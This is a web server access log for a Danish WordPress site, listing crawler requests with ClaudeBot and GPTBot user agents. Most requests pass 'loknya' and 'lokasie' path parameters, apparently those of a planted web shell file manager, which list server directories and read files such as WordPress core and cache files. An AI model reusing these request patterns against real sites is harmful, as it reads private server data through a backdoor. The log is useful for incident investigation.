216.73.216.125 - - [29/Jul/2026:08:38:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F4%2Fd HTTP/2" 200 2051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F3%2F2 HTTP/2" 200 1981 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2Fc%2Ff HTTP/2" 200 1778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:29 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F3%2F4 HTTP/2" 200 1983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:30 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4/2 HTTP/2" 200 1986 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:30 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports/typography.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports HTTP/2" 200 8804 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:30 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FStore-Boers-Vin-26.01-1.pdf&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 55286 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Fe%2Fa HTTP/2" 200 2042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:30 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/ HTTP/2" 200 2074 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/1/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:30 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Fa%2Fe HTTP/2" 200 2045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:31 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns/query-grid-posts.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns HTTP/2" 200 2051 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-patterns" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F4%2F HTTP/2" 200 2070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:31 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5/9 HTTP/2" 200 2039 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F7%2Ff HTTP/2" 200 1978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:31 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/sodium_compat/lib/constants.php&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/sodium_compat/lib HTTP/2" 200 2105 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-includes/sodium_compat/lib" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Ff%2F9 HTTP/2" 200 1985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:31 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Fa%2F9 HTTP/2" 200 2034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:32 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2/4 HTTP/2" 200 2038 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:32 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports/align.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports HTTP/2" 200 2146 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/block-supports" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:32 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs%2Flanguage-chooser.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/2" 200 1976 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:32 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2Fjs%2Fwidgets%2Fmedia-audio-widget.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-admin%2Fjs%2Fwidgets HTTP/2" 200 2935 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:32 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fa%2Fb%2Fa HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:32 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7/ HTTP/2" 200 2080 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:32 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/style-engine/class-wp-style-engine.php&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/style-engine HTTP/2" 200 7710 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/style-engine" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:32 +0200] "GET /index.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2Fb%2Fb2b2d30b8532543f&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2Fb HTTP/2" 200 17672 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:33 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2Fa HTTP/2" 200 2119 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:33 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F4%2F HTTP/2" 200 2184 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:33 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7/f HTTP/2" 200 2028 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:33 +0200] "GET /index.php?loknya=/var/www/vhosts/// HTTP/2" 200 1731 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-borsdk////" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:33 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-includes%2Fjs%2Fmedia-editor.min.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/2" 200 5457 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:33 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fa%2Fa%2Fb HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:33 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/0/f HTTP/2" 200 2089 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:34 +0200] "GET /index.php/sitemap.xml?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates%2Fpage.html&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates HTTP/2" 200 1893 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:33 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./././././httpdocs/wp-includes/blocks/embed/block.json&loknya=/var/www/vhosts/store-bors.dk/./././././httpdocs/wp-includes/blocks/embed HTTP/2" 200 1960 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./././././httpdocs/wp-includes/blocks/embed" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F6%2Fa HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F9%2F7%2Fb HTTP/2" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:34 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4/f HTTP/2" 200 2035 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:34 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/././././httpdocs/wp-includes/blocks/page-list/block.json&loknya=/var/www/vhosts/store-bors.dk/././././httpdocs/wp-includes/blocks/page-list HTTP/2" 200 2213 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././httpdocs/wp-includes/blocks/page-list" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-ors.dk%2Flscache%2F%2F HTTP/2" 200 1769 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:34 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F2%2F6 HTTP/2" 200 1985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:35 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2Fa%2F6 HTTP/2" 200 2027 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:35 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/7 HTTP/2" 200 1988 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:35 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././././././.cagefs/var/spool HTTP/2" 200 1940 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././././././.cagefs/var" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:35 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F3%2F3 HTTP/2" 200 2034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:35 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F3%2Fc HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:35 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3/2 HTTP/2" 200 1991 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:35 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Ff%2F1 HTTP/2" 200 1982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:35 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name/style-rtl.css&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name HTTP/2" 200 1593 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:36 +0200] "GET /index.php/sitemap.xml?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates%2Findex.html&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates HTTP/2" 200 1809 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:36 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2Fa HTTP/2" 200 2045 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:36 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8/3 HTTP/2" 200 1991 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:38:36 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name/style.min.css&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name HTTP/2" 200 1585 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:36 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F5%2Fa HTTP/2" 200 2041 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:36 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F4%2F3 HTTP/2" 200 1984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:37 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvr%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscche%2F1%2Fb%2F HTTP/2" 200 1784 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:37 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2F7%2F2 HTTP/2" 200 1972 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:37 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name/style.css&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name HTTP/2" 200 1591 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:37 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Fa%2F5 HTTP/2" 200 1984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:37 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2/8 HTTP/2" 200 1991 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:37 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2F5%2F HTTP/2" 200 2118 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:37 +0200] "GET /index.php?lokasie=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name/style-rtl.min.css&loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name HTTP/2" 200 1589 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/./httpdocs/wp-includes/blocks/comment-author-name" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:37 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F1%2F HTTP/2" 200 2181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:38 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F3%2Fc HTTP/2" 200 2035 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:38:38 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2/9 HTTP/2" 200 2085 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:38 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F0%2F2%2F HTTP/2" 200 2096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:38:38 +0200] "GET /index.php?loknya=/var/www/vhosts/store-bors.dk/././httpdocs/wp-content/mu-plugins HTTP/2" 200 1809 "https://store-bors.dk/index.php?loknya=/var/www/vhosts/store-bors.dk/././httpdocs/wp-content" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:38:38 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2F0%2F HTTP/2" 200 2154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:39 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2F2%2F3 HTTP/2" 200 2084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:39 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F5%2Fa%2Ff HTTP/2" 200 2098 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:39 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F5%2Ff HTTP/2" 200 1985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:38:39 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fe%2F2%2Fc HTTP/2" 200 1999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
